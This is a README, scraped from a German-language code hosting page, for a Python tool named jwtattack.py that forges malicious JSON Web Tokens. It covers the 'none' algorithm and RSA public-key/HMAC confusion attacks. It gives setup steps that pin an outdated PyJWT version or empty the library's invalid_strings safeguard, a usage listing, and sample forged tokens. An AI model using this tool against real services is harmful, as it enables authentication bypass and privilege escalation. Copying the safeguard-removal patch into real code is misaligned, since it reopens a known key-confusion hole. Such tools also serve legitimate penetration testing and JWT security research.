Du kannst nicht mehr als 25 Themen auswählen
Themen müssen entweder mit einem Buchstaben oder einer Ziffer beginnen. Sie können Bindestriche („-“) enthalten und bis zu 35 Zeichen lang sein.
70 Zeilen
2.4 KiB
Markdown
70 Zeilen
2.4 KiB
Markdown
vor 3 Jahren
|
# jwtattacker.py
|
||
|
|
|
||
|
|
## Requirements
|
||
|
|
* Python3
|
||
|
|
* PyJWT 0.4.3: `pip install pyjwt==0.4.3`
|
||
|
|
|
||
|
|
later versions don't allow public keys for symmetric signatures
|
||
|
|
|
||
|
|
Alternative: replace
|
||
|
|
|
||
|
|
```
|
||
|
|
invalid_strings = [
|
||
|
|
b'-----BEGIN PUBLIC KEY-----',
|
||
|
|
b'-----BEGIN CERTIFICATE-----',
|
||
|
|
b'-----BEGIN RSA PUBLIC KEY-----',
|
||
|
|
b'ssh-rsa'
|
||
|
|
]
|
||
|
|
```
|
||
|
|
|
||
|
|
in algorithms.py with
|
||
|
|
|
||
|
|
|
||
|
|
```
|
||
|
|
invalid_strings = []
|
||
|
|
```
|
||
|
|
|
||
|
|
|
||
|
|
## Usage
|
||
|
|
```
|
||
|
|
$ ./jwtattack.py -h
|
||
|
|
usage: jwtattack.py [-h] [-V] [-v] [-a] [-n] [-r] [-H HEADERS [HEADERS ...]]
|
||
|
|
[-D DATA [DATA ...]]
|
||
|
|
token [PUBLIC_KEY]
|
||
|
|
|
||
|
|
This script tries to create malicious JSON Web Tokens
|
||
|
|
|
||
|
|
positional arguments:
|
||
|
|
token the JWT to attack
|
||
|
|
|
||
|
|
optional arguments:
|
||
|
|
-h, --help show this help message and exit
|
||
|
|
-V, --version show program's version number and exit
|
||
|
|
-v, --verbose display verbose output
|
||
|
|
|
||
|
|
Attack options:
|
||
|
|
Select attack options to generate malicious tokens
|
||
|
|
|
||
|
|
-a, --all generate all possible malicious tokens
|
||
|
|
-n, --none generate a token using the 'none' algorithm
|
||
|
|
-r, --rsa generate a token signed with the public key
|
||
|
|
PUBLIC_KEY public key for the RSA attack (alternatively stdin)
|
||
|
|
-H HEADERS [HEADERS ...], --headers HEADERS [HEADERS ...]
|
||
|
|
Changes to apply to the header, format key:value
|
||
|
|
-D DATA [DATA ...], --data DATA [DATA ...]
|
||
|
|
Changes to apply to the data, format key:value
|
||
|
|
```
|
||
|
|
|
||
|
|
## Sample output
|
||
|
|
```
|
||
|
|
$ echo "-----BEGIN PUBLIC KEY-----
|
||
|
|
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDdlatRjRjogo3WojgGHFHYLugd
|
||
|
|
UWAY9iR3fy4arWNA1KoS8kVw33cJibXr8bvwUAUparCwlvdbH6dvEOfou0/gCFQs
|
||
|
|
HUfQrSDv+MuSUMAe8jzKE4qW+jK+xQU9a03GUnKHkkle+Q0pX/g6jXZ7r1/xAK5D
|
||
|
|
o2kQ+X5xK9cipRgEKwIDAQAB
|
||
|
|
-----END PUBLIC KEY-----" | ./jwtattack.py -a eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWUsImlhdCI6MTUxNjIzOTAyMn0.TCYt5XsITJX1CxPCT8yAV-TVkIEq_PbChOMqsLfRoPsnsgw5WEuts01mq-pQy7UJiN5mgRxD-WUcX16dUEMGlv50aqzpqh4Qktb3rk-BuQy72IFLOqV0G_zS245-kronKb78cPN25DGlcTwLtjPAYuNzVBAh4vGHSrQyHUdBBPM
|
||
|
|
None: eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWUsImlhdCI6MTUxNjIzOTAyMn0.
|
||
|
|
RSA: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWUsImlhdCI6MTUxNjIzOTAyMn0.mm69FICCR3LpghwmUJDjrwcrXlqkvgbKGiLhUp-jI5U
|
||
|
|
```
|
||
|
|
|